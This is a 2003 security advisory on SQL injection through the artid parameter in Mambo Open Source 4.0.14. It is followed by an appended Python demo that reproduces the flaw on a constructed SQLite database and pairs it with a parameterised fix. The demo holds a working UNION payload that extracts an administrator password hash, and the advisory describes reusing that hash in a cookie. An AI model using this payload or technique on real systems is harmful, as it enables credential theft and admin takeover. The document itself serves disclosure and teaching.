Mambo Open Source 4.0.14 SQL injection

From: Chintan Trivedi (
Date: 12/10/03

  • Next message: William Stockall: "Re: Internet Explorer URL parsing vulnerability"
    Date: 10 Dec 2003 17:56:31 -0000

    Mambo Open Source 4.0.14


            Mambo Open Source is an open source web content management system. It is used by many websites, including commercial ones.

    The function show() in the file mambo/articles.php looks like this:

    function show ($articles, $database, $dbprefix, $artid, $gid, $db) {
            // $artid and $gid are interpolated straight into the SQL string;
            // neither is cast to an integer or escaped before use
            $query = "SELECT title, content, author FROM ".$dbprefix."articles, ".$dbprefix."categories WHERE artid=$artid AND ".$dbprefix."articles.published=1 AND ".$dbprefix."categories.categoryid=".$dbprefix."articles.catid AND ".$dbprefix."categories.access <=$gid";
            // the unmodified string is handed to the database layer
            $result = $database->openConnectionWithReturn($query);
            // ...


    There is no input validation on the variable artid. An attacker can thus append his own SQL query, read the administrator's MD5 password hash from the mod_users table, and use it in the cookie to gain admin access to the Mambo CMS.

    How do I know whether I am vulnerable?

    If you pass a value such as "1 UNION somequery" as artid and get an error message like

    Query failed with error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION somequery AND mos_articles.published=1 AND mos_categories.

    then you are vulnerable: the injected text reached the database unchanged. An attacker can use "/*" to comment out the rest of the query, so the trailing AND conditions no longer break the injected UNION.


    Chintan Trivedi -
    "Eye On Security Research Group India".
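    The following is an added worked example, not code from the advisory or from Mambo. It ports the string concatenation of show() to Python over an in-memory SQLite database so the injection described above (a UNION SELECT followed by "/*") can be run end to end, and puts the fix beside it: cast artid and gid to integers before they get near the query, and bind them as parameters. The schema, the column names, and the users table (called mos_users here, with invented columns) are constructed for this demo and are assumptions, not Mambo's real tables; the MD5 value is a constructed sample. The probe() function reproduces the advisory's own check: a broken "UNION somequery" in artid surfaces as a SQL syntax error from the database.

```python
import sqlite3

# Constructed demo schema (assumption): only the columns needed by the query in show().
# The users table name and its columns are invented for this example.
DEMO_SCHEMA = """
CREATE TABLE mos_articles (artid INTEGER, title TEXT, content TEXT, author TEXT,
                           published INTEGER, catid INTEGER);
CREATE TABLE mos_categories (categoryid INTEGER, access INTEGER);
CREATE TABLE mos_users (username TEXT, password TEXT, usertype TEXT);
INSERT INTO mos_articles VALUES (1, 'Hello', 'Body', 'editor', 1, 10);
INSERT INTO mos_articles VALUES (2, 'Draft', 'Unpublished', 'editor', 0, 10);
INSERT INTO mos_categories VALUES (10, 0);
INSERT INTO mos_users VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99', 'superadministrator');
"""


def open_demo_db():
    db = sqlite3.connect(":memory:")
    db.executescript(DEMO_SCHEMA)
    return db


def vulnerable_query(artid, gid, dbprefix="mos_"):
    """Same concatenation as show(): artid and gid are pasted into the SQL unchecked."""
    p = dbprefix
    return (f"SELECT title, content, author FROM {p}articles, {p}categories "
            f"WHERE artid={artid} AND {p}articles.published=1 "
            f"AND {p}categories.categoryid={p}articles.catid "
            f"AND {p}categories.access <={gid}")


def hardened_query(artid, gid, dbprefix="mos_"):
    """Fix: force both inputs to integers (a non-numeric artid raises ValueError
    before any SQL is built) and bind them as parameters instead of interpolating."""
    artid = int(artid)
    gid = int(gid)
    p = dbprefix
    sql = (f"SELECT title, content, author FROM {p}articles, {p}categories "
           f"WHERE artid=? AND {p}articles.published=1 "
           f"AND {p}categories.categoryid={p}articles.catid "
           f"AND {p}categories.access <=?")
    return sql, (artid, gid)


def show_vulnerable(db, artid, gid):
    return db.execute(vulnerable_query(artid, gid)).fetchall()


def show_hardened(db, artid, gid):
    try:
        sql, params = hardened_query(artid, gid)
    except ValueError:
        return []  # reject the request rather than run a mangled query
    return db.execute(sql, params).fetchall()


def probe(db, artid="1 UNION somequery"):
    """The advisory's check: with unchecked concatenation the broken UNION reaches the
    database and comes back as a syntax error, which is the signal that artid is injectable."""
    try:
        db.execute(vulnerable_query(artid, 0)).fetchall()
    except sqlite3.OperationalError:
        return True
    return False


# Payload of the kind the advisory describes: the UNION pulls the password hash out of the
# users table, and the unterminated "/*" swallows the remaining AND conditions.
PAYLOAD = "0 UNION SELECT username, password, usertype FROM mos_users/*"

if __name__ == "__main__":
    db = open_demo_db()
    print(show_vulnerable(db, 1, 0))        # legitimate request: the article row
    print(show_vulnerable(db, PAYLOAD, 0))  # attacker gets the admin row instead
    print(show_hardened(db, PAYLOAD, 0))    # rejected: empty result
    print(probe(db))                        # True: syntax error reached the database
```

The vulnerable path returns the row from the users table because the attacker's UNION has the same three columns as the original SELECT, and the "/*" means the trailing conditions never apply. The hardened path never sees the payload as SQL: int() rejects it, and a legitimate artid is bound as a parameter so even a numeric string cannot change the statement's shape.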


